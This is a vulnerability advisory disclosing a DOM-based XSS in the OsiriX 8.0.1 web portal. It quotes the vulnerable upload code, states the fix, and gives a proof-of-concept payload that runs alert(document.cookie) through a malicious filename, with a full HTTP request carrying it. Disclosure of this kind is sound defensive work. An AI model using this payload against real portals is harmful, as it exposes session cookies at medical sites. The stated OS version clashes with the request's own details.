OsiriX Web Portal 8.0.1 DOM Based XSS


Vendor: Pixmeo Sarl
Product web page: http://www.osirix-viewer.com
Affected version: OsiriX 8.0.1

Summary: With high performance and an intuitive interactive user interface, OsiriX MD is
the most widely used DICOM viewer in the world. It is the result of more than 10 years of
research and development in digital imaging. It fully supports the DICOM standard for an
easy integration in your workflow environment and an open platform for development of
processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive
innovative technique for 3D and 4D navigation and a complete integration with any PACS.
OsiriX MD supports 64-bit computing and multithreading for the best performances on the
most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.

Desc: OsiriX suffers from a DOM-based XSS vulnerability because it doesn't use proper sanitization
when user input goes to a dangerous HTML modification sink ((element).innerHTML). This can be
exploited to execute arbitrary HTML and script code in a user's browser DOM in context of an
affected site.

Tested on: macOS 12.10.2 (Sierra)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5381
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5381.php


29.11.2016

--


------vuln-----

	                function fileSelected() {
	                    var file = document.getElementById('fileToUpload').files[0];
	                    if (file) {
	                        var fileSize = 0;
	                        if (file.size > 1024 * 1024)
	                        fileSize = (Math.round(file.size * 100 / (1024 * 1024)) / 100).toString() + 'MB';
	                        else
	                        fileSize = (Math.round(file.size * 100 / 1024) / 100).toString() + 'KB';
                        
	                        document.getElementById('fileName').innerHTML = 'Name: ' + file.name; // xss
	                        document.getElementById('fileSize').innerHTML = 'Size: ' + fileSize;
	                        document.getElementById('fileType').innerHTML = 'Type: ' + file.type;
	                    }
	                }
                
	                function uploadFile()
					{
						document.getElementById('progressbar').innerHTML = '0%';
						document.getElementById("progressbar").style.width = '0%';
						document.getElementById("progressbar").className = "progress-bar progress-bar-striped";
						document.getElementById("upload_button").className = "btn btn-default disabled";
						
						setTimeout(function(){

							var fd = new FormData();
							fd.append("fileToUpload", document.getElementById('fileToUpload').files[0]);
							var xhr = new XMLHttpRequest();
							xhr.upload.addEventListener("progress", uploadProgress, false);
							xhr.addEventListener("load", uploadComplete, false);
							xhr.addEventListener("error", uploadFailed, false);
							xhr.addEventListener("abort", uploadCanceled, false);
							xhr.open("POST", "", true);
							xhr.send(fd);

						}, 500);
	                }

...

	<form class="col-md-12" id="form1" action="javascript:void(0);" method="post" enctype="multipart/form-data">
					<div class="form-group col-md-12">
						<label for="fileToUpload">File input</label>
						<input type="file" name="file" id="fileToUpload" onchange="fileSelected();">
						<div class="help-block">
							<div id="fileName"></div> // xss
							<div id="fileSize"></div>
							<div id="fileType"></div>
						</div>
					</div>
					<div class="col-lg-2 col-md-3">
						<button type="submit" class="btn btn-default" id="upload_button" name="upload_button" onclick="uploadFile()" value="Upload">Upload</button>
					</div>
					<div class="col-lg-10 col-md-9 help-block">
						<div class="progress" id="progressbar_containter" style="display: none;">
							<div class="progress-bar progress-bar-striped" id="progressbar" role="progressbar" aria-valuenow="2" aria-valuemin="0" aria-valuemax="100" style="min-width: 2em;"></div>
						</div>
					</div>
				</form>


------/vuln-----

Element output: <div id="fileName">Name: <img src="#" onerror="alert(document.cookie)" :="">.mp3</div>
Fix: (element).innerText or (element).textContent

PoC payload: <img src="#" onerror="alert(document.cookie")/>:


POST /main HTTP/1.1
Host: 127.0.0.1:3333
Content-Length: 381
Origin: http://127.0.0.1:3333
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBUg5yXYbUF1w5AEi
Accept: */*
Referer: http://127.0.0.1:3333/main
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
Cookie: OSID=53B11D55703E7A7DA14AF867B2C7E346
DNT: 1
Connection: close

------WebKitFormBoundaryBUg5yXYbUF1w5AEi
Content-Disposition: form-data; name="fileToUpload"; filename="<img src=%22#%22 onerror=%22alert(document.cookie)%22:>.mp3"
Content-Type: audio/mp3

Zero Science Lab
------WebKitFormBoundaryBUg5yXYbUF1w5AEi--